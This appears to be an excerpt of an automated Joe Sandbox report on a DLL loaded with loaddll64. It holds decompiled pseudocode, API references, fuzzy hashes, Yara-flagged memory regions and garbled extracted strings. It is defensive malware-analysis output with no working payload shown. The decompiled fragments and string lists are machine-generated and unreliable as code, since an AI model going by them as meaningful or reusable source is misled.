                                                                                                        • Opcode ID: 162d5b836d3a2cf9bbde74f51cfd96032ed20fc03a3f05e88ec8900bcc2c8201
                                                                                                        • Instruction ID: f95ac1ecd4c279b2a9a35e83637c6258d8e9988cd5864c3964b2ca2027803fe7
                                                                                                        • Opcode Fuzzy Hash: 162d5b836d3a2cf9bbde74f51cfd96032ed20fc03a3f05e88ec8900bcc2c8201
                                                                                                        • Instruction Fuzzy Hash: 2AD05E2A92899582C610AB20E84205E6320F7C23B0FE05720EAFC03AE5CE2AD5158B00
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 44%
                                                                                                        			E00007FFC7FFC123D1B10(void* __rax, long long __rcx, long long __rdx, long long _a8, long long _a16) {
                                                                                                        				void* _t7;
                                                                                                        				void* _t8;
                                                                                                        
                                                                                                        				_t8 = __rax;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				E00007FFC7FFC123D11A0(_a16);
                                                                                                        				_t7 = E00007FFC7FFC123D1B40(_t8, _a8, _a16, _t8); // executed
                                                                                                        				return _t7;
                                                                                                        			}





                                                                                                        0x7ffc123d1b10
                                                                                                        0x7ffc123d1b10
                                                                                                        0x7ffc123d1b15
                                                                                                        0x7ffc123d1b23
                                                                                                        0x7ffc123d1b35
                                                                                                        0x7ffc123d1b3e

                                                                                                        APIs
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC123D1B23
                                                                                                          • Part of subcall function 00007FFC123D1B40: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D1B6E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Base::Concurrency::details::ContextIdentityQueueWorkchar_traits
                                                                                                        • String ID:
                                                                                                        • API String ID: 1444011685-0
                                                                                                        • Opcode ID: f789d12e206d7980509269e3e814af15646fd7b4fc038a1338794e0a1668acec
                                                                                                        • Instruction ID: f0ada0ce050c7dc9f67d79a705baa0bead92aabb14f41c8bfc14934420b3599d
                                                                                                        • Opcode Fuzzy Hash: f789d12e206d7980509269e3e814af15646fd7b4fc038a1338794e0a1668acec
                                                                                                        • Instruction Fuzzy Hash: 0DD09E6A929A8582D644EB52F89109AA764FBC47D0FC05475FACE42B2ADF68C1618B00
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$CreateMessageRegisterTouch
                                                                                                        • String ID: Cannot register application window for multi-touch input$Error
                                                                                                        • API String ID: 490141109-480840240
                                                                                                        • Opcode ID: 84ab5ff6cfcc38e4e1d3a2e7420c273c9b72630a33a8e8b258941c1555e1b344
                                                                                                        • Instruction ID: 4514a1bf0832fda67742a39cc4e4a9a829c92a93074b6778cdc3d0a6b8d20cf4
                                                                                                        • Opcode Fuzzy Hash: 84ab5ff6cfcc38e4e1d3a2e7420c273c9b72630a33a8e8b258941c1555e1b344
                                                                                                        • Instruction Fuzzy Hash: 7351FB79908F6A82F7609B15E8943EA73A0FBC87A4F500535D68E47764DFBCE068C760
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: %wk$@$Hp$KI@l$]I$^e?u$~JO$K
                                                                                                        • API String ID: 0-1942796489
                                                                                                        • Opcode ID: 0db96a3033a52dec7f41ba08dcaea74adbed8d76393b2956a65234561adab349
                                                                                                        • Instruction ID: e1c3b1e3eb44e9ced759bc87f3cac7b1a040f97d798b52c0718f9fedf429efa7
                                                                                                        • Opcode Fuzzy Hash: 0db96a3033a52dec7f41ba08dcaea74adbed8d76393b2956a65234561adab349
                                                                                                        • Instruction Fuzzy Hash: 71A2F871504B8C8FEB59CF28C88A59E7BE2FB84744F20461DF96A872A0D774D945CF82
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: k$7'$D$G($Z<$o7=/$y
                                                                                                        • API String ID: 0-1865188920
                                                                                                        • Opcode ID: d517ad9a530fb802bb13479e859ccf9692cae92b90ad32258a35f0c9934de413
                                                                                                        • Instruction ID: fda8176045f72ddac869dc68b56e77e08c564191d5b4e17a01401cd0e62d40de
                                                                                                        • Opcode Fuzzy Hash: d517ad9a530fb802bb13479e859ccf9692cae92b90ad32258a35f0c9934de413
                                                                                                        • Instruction Fuzzy Hash: 2032E17150C7848FD798CFA9C58A65BFBE1FB88744F108A1DF486862A0D7F8D949CB42
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 65%
                                                                                                        			E00007FFC7FFC123D9474(void* __ecx, intOrPtr __edx, void* __esp, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
                                                                                                        				void* __rdi;
                                                                                                        				void* _t36;
                                                                                                        				int _t40;
                                                                                                        				void* _t45;
                                                                                                        				intOrPtr _t53;
                                                                                                        				signed long long _t63;
                                                                                                        				long long _t66;
                                                                                                        				_Unknown_base(*)()* _t86;
                                                                                                        				void* _t90;
                                                                                                        				void* _t91;
                                                                                                        				void* _t93;
                                                                                                        				signed long long _t94;
                                                                                                        				struct _EXCEPTION_POINTERS* _t100;
                                                                                                        
                                                                                                        				_t46 = __ecx;
                                                                                                        				 *((long long*)(_t93 + 0x10)) = __rbx;
                                                                                                        				 *((long long*)(_t93 + 0x18)) = __rsi;
                                                                                                        				_t91 = _t93 - 0x4f0;
                                                                                                        				_t94 = _t93 - 0x5f0;
                                                                                                        				_t63 =  *0x1244e008; // 0xbe8d44b92f09
                                                                                                        				 *(_t91 + 0x4e0) = _t63 ^ _t94;
                                                                                                        				_t53 = r8d;
                                                                                                        				_t45 = __ecx;
                                                                                                        				if (__ecx == 0xffffffff) goto 0x123d94b3;
                                                                                                        				E00007FFC7FFC123D493C(_t36);
                                                                                                        				r8d = 0x98;
                                                                                                        				E00007FFC7FFC123D6920(__ecx, 0, _t53, __esp, _t94 + 0x70, __rdx, _t86, __r8);
                                                                                                        				r8d = 0x4d0;
                                                                                                        				E00007FFC7FFC123D6920(_t46, 0, _t53, __esp, _t91 + 0x10, __rdx, _t86, __r8);
                                                                                                        				 *((long long*)(_t94 + 0x48)) = _t94 + 0x70;
                                                                                                        				_t66 = _t91 + 0x10;
                                                                                                        				 *((long long*)(_t94 + 0x50)) = _t66;
                                                                                                        				__imp__RtlCaptureContext();
                                                                                                        				r8d = 0;
                                                                                                        				__imp__RtlLookupFunctionEntry();
                                                                                                        				if (_t66 == 0) goto 0x123d9546;
                                                                                                        				 *(_t94 + 0x38) =  *(_t94 + 0x38) & 0x00000000;
                                                                                                        				 *((long long*)(_t94 + 0x30)) = _t94 + 0x58;
                                                                                                        				 *((long long*)(_t94 + 0x28)) = _t94 + 0x60;
                                                                                                        				 *((long long*)(_t94 + 0x20)) = _t91 + 0x10;
                                                                                                        				__imp__RtlVirtualUnwind();
                                                                                                        				 *((long long*)(_t91 + 0x108)) =  *((intOrPtr*)(_t91 + 0x508));
                                                                                                        				 *((intOrPtr*)(_t94 + 0x70)) = __edx;
                                                                                                        				 *((long long*)(_t91 + 0xa8)) = _t91 + 0x510;
                                                                                                        				 *((long long*)(_t91 - 0x80)) =  *((intOrPtr*)(_t91 + 0x508));
                                                                                                        				 *((intOrPtr*)(_t94 + 0x74)) = _t53;
                                                                                                        				_t40 = IsDebuggerPresent();
                                                                                                        				SetUnhandledExceptionFilter(_t86, _t90);
                                                                                                        				if (UnhandledExceptionFilter(_t100) != 0) goto 0x123d95a8;
                                                                                                        				if (_t40 != 0) goto 0x123d95a8;
                                                                                                        				if (_t45 == 0xffffffff) goto 0x123d95a8;
                                                                                                        				return E00007FFC7FFC123D3A70(E00007FFC7FFC123D493C(_t42), _t45, 0,  *(_t91 + 0x4e0) ^ _t94);
                                                                                                        			}
















                                                                                                        0x7ffc123d9474
                                                                                                        0x7ffc123d9474
                                                                                                        0x7ffc123d9479
                                                                                                        0x7ffc123d9482
                                                                                                        0x7ffc123d948a
                                                                                                        0x7ffc123d9491
                                                                                                        0x7ffc123d949b
                                                                                                        0x7ffc123d94a2
                                                                                                        0x7ffc123d94a7
                                                                                                        0x7ffc123d94ac
                                                                                                        0x7ffc123d94ae
                                                                                                        0x7ffc123d94ba
                                                                                                        0x7ffc123d94c0
                                                                                                        0x7ffc123d94cb
                                                                                                        0x7ffc123d94d1
                                                                                                        0x7ffc123d94db
                                                                                                        0x7ffc123d94e4
                                                                                                        0x7ffc123d94e8
                                                                                                        0x7ffc123d94ed
                                                                                                        0x7ffc123d9502
                                                                                                        0x7ffc123d9505
                                                                                                        0x7ffc123d950e
                                                                                                        0x7ffc123d9510
                                                                                                        0x7ffc123d9523
                                                                                                        0x7ffc123d9530
                                                                                                        0x7ffc123d9539
                                                                                                        0x7ffc123d9540
                                                                                                        0x7ffc123d954d
                                                                                                        0x7ffc123d955f
                                                                                                        0x7ffc123d9563
                                                                                                        0x7ffc123d9571
                                                                                                        0x7ffc123d9575
                                                                                                        0x7ffc123d9579
                                                                                                        0x7ffc123d9583
                                                                                                        0x7ffc123d9596
                                                                                                        0x7ffc123d959a
                                                                                                        0x7ffc123d959f
                                                                                                        0x7ffc123d95ce

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 1239891234-0
                                                                                                        • Opcode ID: d9a81825362c2da034dc73a6dcc45eb26ccc4f6f61a283cd1a377bdfab111a7c
                                                                                                        • Instruction ID: ef0e7ff1a4151e49f4bcc798ac9ea9e4c0c987d842c126bd651e610fae388ddc
                                                                                                        • Opcode Fuzzy Hash: d9a81825362c2da034dc73a6dcc45eb26ccc4f6f61a283cd1a377bdfab111a7c
                                                                                                        • Instruction Fuzzy Hash: 08318C3A608F9586EB60CB25E8402EE73A4FB88764F800136EA9D43B95DF78D165CB10
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: >#3$??$Aw$F$J
                                                                                                        • API String ID: 0-2784440385
                                                                                                        • Opcode ID: 9b37fcd8b9b3a2236a01d1c259a381c152bbfd2ce75b9ee2bc70d5e09618c5cf
                                                                                                        • Instruction ID: 9fdd82093245732d6ff01b86e1d36ab714c40b68dc6afb612ae034bafb5e4a55
                                                                                                        • Opcode Fuzzy Hash: 9b37fcd8b9b3a2236a01d1c259a381c152bbfd2ce75b9ee2bc70d5e09618c5cf
                                                                                                        • Instruction Fuzzy Hash: C9924F7054838B8FDB78CF24C845BEE7BE1FB84304F10452DE8698A761E7749A49DB82
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $$9`^p$>S1$@K$<
                                                                                                        • API String ID: 0-904861090
                                                                                                        • Opcode ID: 7e13130689c942aa12df05012069a4264cc12f2cb0cc79f599492960cab10520
                                                                                                        • Instruction ID: d0ca11fee3017775904e89b4535bcf8825016c76ce67da6f48249d0445d1abfd
                                                                                                        • Opcode Fuzzy Hash: 7e13130689c942aa12df05012069a4264cc12f2cb0cc79f599492960cab10520
                                                                                                        • Instruction Fuzzy Hash: BC12E37150078CDBDBACCF68C88A6DD3FB1FB443A4F605219F942962A0D7B5D989CB81
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: "4$f_$fzT$$
                                                                                                        • API String ID: 0-2251851231
                                                                                                        • Opcode ID: 22d9a0b68b50d0ea5fd6d1aeab0a3e2fc9a27e070a6cf0ea182e7b607f92900b
                                                                                                        • Instruction ID: 00078a186b7d7b6ae4f12e3c11a5bc13b18b9b2cdced29765063d95cb29d2c11
                                                                                                        • Opcode Fuzzy Hash: 22d9a0b68b50d0ea5fd6d1aeab0a3e2fc9a27e070a6cf0ea182e7b607f92900b
                                                                                                        • Instruction Fuzzy Hash: 42B123B090470A8FDB48DFA8C48A5EEBBF0FB48358F15461DE806A7290D774AA45CFC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: CX$[n$\$eI$E$8
                                                                                                        • API String ID: 0-2019653245
                                                                                                        • Opcode ID: b58e03c4429f51dfff5bc7e79067d6589c1b082eef975631b4c3cbf620760393
                                                                                                        • Instruction ID: b0bde2b46dd9974091b147c1be75073ae13835eaf58c76366964caef907b3f92
                                                                                                        • Opcode Fuzzy Hash: b58e03c4429f51dfff5bc7e79067d6589c1b082eef975631b4c3cbf620760393
                                                                                                        • Instruction Fuzzy Hash: 4E318EB190074E8FDB44CF64C48A5CE7FB0FB68798F204618E859A6250D3B896A4CBD5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $ $$$|nV
                                                                                                        • API String ID: 0-3281042611
                                                                                                        • Opcode ID: a7c4594aceaea0e8dab67c6b4234a17b84941429c25f26251dab7e9d55dda18c
                                                                                                        • Instruction ID: 0fceca5626e055d2fbf750ad096c81a0ae15a929736b2a3d881e47323bd06dff
                                                                                                        • Opcode Fuzzy Hash: a7c4594aceaea0e8dab67c6b4234a17b84941429c25f26251dab7e9d55dda18c
                                                                                                        • Instruction Fuzzy Hash: DA72FA71A0474C8BDF58CFA8C04AADDBBF5FB54344F00412DED4AAB298D7B4A91ACB45
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: R7i$VG$]>S$u`
                                                                                                        • API String ID: 0-1600827667
                                                                                                        • Opcode ID: 32acbc697c5eb7ce2dca7a46b63a12961e990b109133ed3221841dcaa14a51a8
                                                                                                        • Instruction ID: e69c950c419dafbc2894b984fb63416e0ad2d3a581be44541dc433b6a47a3fb9
                                                                                                        • Opcode Fuzzy Hash: 32acbc697c5eb7ce2dca7a46b63a12961e990b109133ed3221841dcaa14a51a8
                                                                                                        • Instruction Fuzzy Hash: DC32F1709097C88BDBF8DF24C8897DD7BE0FF48344F50515A984E9A694CBB86689CF42
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: BB$z<$.$4
                                                                                                        • API String ID: 0-1591233792
                                                                                                        • Opcode ID: aa7d0a4ee19aefbaa19c8d8e8495d0b927018643d7d53871069b311c10225edc
                                                                                                        • Instruction ID: f44964999cc3d50e9f587f9f9c8efa5a6e46c46b2493dcde8a40a3edfa6d90f8
                                                                                                        • Opcode Fuzzy Hash: aa7d0a4ee19aefbaa19c8d8e8495d0b927018643d7d53871069b311c10225edc
                                                                                                        • Instruction Fuzzy Hash: 3302047190474DCBDF6CDF68C88A6EE7BB0FF48344F00421DEA46A6290D77A9949CB84
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Jx$M[$jP$xy
                                                                                                        • API String ID: 0-882801676
                                                                                                        • Opcode ID: a27b4655e249ce8e00af1ad73db02211fa2bbf7353868e6a6b849cd1b884cbbc
                                                                                                        • Instruction ID: 58f3606e86ff435d226b8bd8aedcb6a7b303468577bfe9f696ea944d9a70988a
                                                                                                        • Opcode Fuzzy Hash: a27b4655e249ce8e00af1ad73db02211fa2bbf7353868e6a6b849cd1b884cbbc
                                                                                                        • Instruction Fuzzy Hash: DBC1087090475CCBDF59DF68D8896DDBBB0FB48308F118219F89AAB2A1CB789905CF45
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: &$@2$Jn$^
                                                                                                        • API String ID: 0-1816242221
                                                                                                        • Opcode ID: 569fa3d4bf83859d4808d779e504945ae089fbdc48947470bf052a87739f6000
                                                                                                        • Instruction ID: b42d7ccd07b59f248f07516313cf01464c8448466868081e17338bda4afdc4d1
                                                                                                        • Opcode Fuzzy Hash: 569fa3d4bf83859d4808d779e504945ae089fbdc48947470bf052a87739f6000
                                                                                                        • Instruction Fuzzy Hash: 95910470D0471A8BEF98DFA8D48A6EEBBF0FB48344F108119E515B6290D7789A48CF95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0e$64$@$o=
                                                                                                        • API String ID: 0-3194635012
                                                                                                        • Opcode ID: 2a7eec621bc3736d8bcf3cd4502b1118f0a5049720cbc299d1d867f1de7ce1b9
                                                                                                        • Instruction ID: 43be15bbb58683b0ec8bcd6d9d0e20e10858889a9d955228704270f701235499
                                                                                                        • Opcode Fuzzy Hash: 2a7eec621bc3736d8bcf3cd4502b1118f0a5049720cbc299d1d867f1de7ce1b9
                                                                                                        • Instruction Fuzzy Hash: 3B91E47051068C9FDB89DF24D88AADD3BB0FF58348F815319FC8AA6290C778D589CB49
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ;$36H$Yfr4$kWa^
                                                                                                        • API String ID: 0-3599472112
                                                                                                        • Opcode ID: 05a798feef6af16b9893fff0148a6d85916b1b1ef146ddbd548bcf6645ccff48
                                                                                                        • Instruction ID: 61779539911d561746882ab877a6c74db6c2f424096ebd80c4a9c7726920f4e4
                                                                                                        • Opcode Fuzzy Hash: 05a798feef6af16b9893fff0148a6d85916b1b1ef146ddbd548bcf6645ccff48
                                                                                                        • Instruction Fuzzy Hash: 1B41A0B090034E8FDF48CF24C9865DE7FB0FB68394F214619E85AA6250D77896A5CBC4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ?M$B $bN$u
                                                                                                        • API String ID: 0-4267052880
                                                                                                        • Opcode ID: c9a15cb732fd24f5d33c0626e266d07e83fb093bffd41cbb69e3c4f465881b9b
                                                                                                        • Instruction ID: 4c93545f67a4f45fbff1f0d508ee645a9c55300ad5c75e3690df59447bdefe11
                                                                                                        • Opcode Fuzzy Hash: c9a15cb732fd24f5d33c0626e266d07e83fb093bffd41cbb69e3c4f465881b9b
                                                                                                        • Instruction Fuzzy Hash: 0F3119715187808FD76CCF28C19A25FBBF1BBC6704F50891CF68A8A390D7B69908CB42
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ($U$wU
                                                                                                        • API String ID: 0-2031152664
                                                                                                        • Opcode ID: d030330acb421e585ce2b574953e0510a66a350c77e1366bf0b1b6b086404ac8
                                                                                                        • Instruction ID: 63807de6178b1657ad1a902dfd73c136082737fd32258a2b89e90bae0d465738
                                                                                                        • Opcode Fuzzy Hash: d030330acb421e585ce2b574953e0510a66a350c77e1366bf0b1b6b086404ac8
                                                                                                        • Instruction Fuzzy Hash: 4E42C5719097C88BDBF9DE24C8893DD7BF0FF48344F50515A984E9A694CBB86688CF42
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: y$!d.#$U
                                                                                                        • API String ID: 0-1702114524
                                                                                                        • Opcode ID: 061c74f3ba4e2152ff7bfc3bb03a690cfa0dcda01d33ce28c375482b364cb02f
                                                                                                        • Instruction ID: 4b2da67fef5f64081cc442b482ab5a3168f7e247fbdeb14fd0ac8dc0810a9ec3
                                                                                                        • Opcode Fuzzy Hash: 061c74f3ba4e2152ff7bfc3bb03a690cfa0dcda01d33ce28c375482b364cb02f
                                                                                                        • Instruction Fuzzy Hash: 7702B371504AC88BDBBDDF24CC897EF7BA1FB44346F10561AD88A9A290DBB45785CF01
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: =1Z$h^$h
                                                                                                        • API String ID: 0-2636329743
                                                                                                        • Opcode ID: 36181cb170d6f76158f3dc770eb623a7b3ca10ea6b51aaa1b83d78e1cc7645e9
                                                                                                        • Instruction ID: b01e88b6b57ba4d7dccfa73d8ad07d3cee0fb8b291d2e61316bf3d6cb9ca5404
                                                                                                        • Opcode Fuzzy Hash: 36181cb170d6f76158f3dc770eb623a7b3ca10ea6b51aaa1b83d78e1cc7645e9
                                                                                                        • Instruction Fuzzy Hash: 42E1D9705087C8CBEBBECF64C8897DA7BA8FB44708F10561DE94A9E258DB745749CB01
